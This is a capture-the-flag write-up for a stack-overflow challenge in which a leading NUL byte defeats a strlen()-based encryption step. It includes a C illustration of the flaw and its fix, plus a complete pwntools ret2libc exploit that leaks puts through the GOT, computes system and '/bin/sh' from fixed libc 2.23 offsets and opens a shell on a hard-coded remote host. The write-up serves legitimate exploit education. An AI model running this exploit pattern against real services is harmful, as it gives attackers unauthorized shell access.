The challenge presents a menu with three options: encrypt, decrypt, and exit.

Choosing 1 enters the encryption function.
Entering 2 prints "I think u can ....".
Entering 3 exits the program.

Looking at the encryption function, the program has a stack overflow, and it also runs a series of encryption steps over the user's input. The length it uses comes from strlen(), which scans the input until it hits a "\x00" byte, so putting "\x00" as the first character of the input makes the encryption logic skip everything after it. From there, ret2libc is used to get a shell.
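
The defect described above, as an added C illustration (not the challenge binary's code): a transform whose length comes from strlen() touches zero bytes when the first byte is NUL, while a transform driven by the byte count the read call returned covers the whole input. The 0x50 buffer size is an assumption taken from the 0x50 + 0x8 offset used later in the exploit; the XOR transform is a stand-in for the challenge's unknown encryption; receive_bounded() is the hypothetical bounded read that would have prevented the overflow in the first place.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumption: a 0x50-byte stack buffer, the size implied by the 0x50 + 0x8
 * offset in the write-up. */
#define BUF_SIZE 0x50

/* Stand-in transform; the challenge's real encryption is not reproduced here. */
static void xor_bytes(uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        buf[i] ^= 0x5a;
}

/* Weak pattern: the length is taken from strlen(), which stops at the first
 * NUL byte, so the received byte count is ignored. Returns how many bytes
 * were actually transformed. */
size_t transform_strlen(uint8_t *buf, size_t received)
{
    (void)received;
    size_t n = strlen((const char *)buf);
    xor_bytes(buf, n);
    return n;
}

/* Corrected pattern: the length is the byte count the read call returned,
 * so an embedded NUL no longer cuts the transform short. */
size_t transform_counted(uint8_t *buf, size_t received)
{
    xor_bytes(buf, received);
    return received;
}

/* Corrected read (hypothetical): reject input that does not fit instead of
 * letting it run past the buffer into the saved rbp and return address.
 * Returns the number of bytes accepted, or -1 if rejected. */
int receive_bounded(uint8_t *dst, size_t dst_size, const uint8_t *src, size_t src_len)
{
    if (src_len > dst_size)
        return -1;
    memcpy(dst, src, src_len);
    return (int)src_len;
}

int main(void)
{
    /* Constructed input: a leading NUL followed by four bytes, the shape the
     * write-up relies on. The +1 keeps strlen() inside the array. */
    uint8_t weak_buf[BUF_SIZE + 1] = {0};
    uint8_t safe_buf[BUF_SIZE + 1] = {0};
    const uint8_t sample[] = { 0x00, 'a', 'a', 'a', 'a' };

    receive_bounded(weak_buf, BUF_SIZE, sample, sizeof sample);
    receive_bounded(safe_buf, BUF_SIZE, sample, sizeof sample);
    printf("strlen-based transform touched %zu bytes\n",
           transform_strlen(weak_buf, sizeof sample));
    printf("count-based transform touched %zu bytes\n",
           transform_counted(safe_buf, sizeof sample));

    /* An input of buffer size plus the saved-rbp slot is refused outright. */
    uint8_t oversized[BUF_SIZE + 8] = {0};
    printf("oversized input accepted: %d\n",
           receive_bounded(weak_buf, BUF_SIZE, oversized, sizeof oversized));
    return 0;
}
```

The two fixes are independent: counting bytes rather than calling strlen() closes the NUL-byte bypass of the transform, and bounding the read closes the overflow that the bypass is used to reach.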

Exploit:
from pwn import *
from LibcSearcher import *
ip = "49.232.142.230"
port = 17738
p = remote(ip, port)
# p = process("./pwn")
elf = ELF("./pwn")
rop = ROP("./pwn")
rdi = rop.find_gadget(["pop rdi", "ret"])[0]  # pop rdi; ret gadget from the binary
ret = rop.find_gadget(["ret"])[0]             # plain ret, used below for stack alignment
main = elf.symbols["main"]
plt = elf.plt["puts"]
got = elf.got["puts"]
p.sendlineafter(b"choice!\n", b"1")           # menu option 1: encrypt
# Leading NUL byte: strlen() returns 0, so the encryption loop leaves the rest untouched
payload = b"\0"
payload += b"a"*(0x50 + 0x8 - 0x1)            # 0x50 buffer + 8 saved rbp, minus the NUL already placed
payload += p64(rdi)
payload += p64(got)                           # puts(puts@got) leaks the libc address of puts
payload += p64(plt)
payload += p64(main)                          # return to main for a second round
p.sendlineafter(b"encrypted\n", payload)
puts = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
log.success("puts ---> %#x", puts)
# Offsets below are for libc6_2.23-0ubuntu11.3_amd64 (see the libc note after the script)
libc_base = puts - 0x06f6a0
system = libc_base + 0x0453a0
binsh = libc_base + 0x18ce57
'''libc = LibcSearcher("puts", puts)
libc_base = puts - libc.dump("puts")
system = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")'''
payload2 = b"\0"
payload2 += b"a"*(0x50 + 0x8 - 0x1)
payload2 += p64(ret)                          # keep the stack 16-byte aligned before system()
payload2 += p64(rdi)
payload2 += p64(binsh)
payload2 += p64(system)
p.sendlineafter(b"choice!\n", b"1")
p.sendlineafter(b"encrypted\n", payload2)
p.interactive()
libc: libc6_2.23-0ubuntu11.3_amd64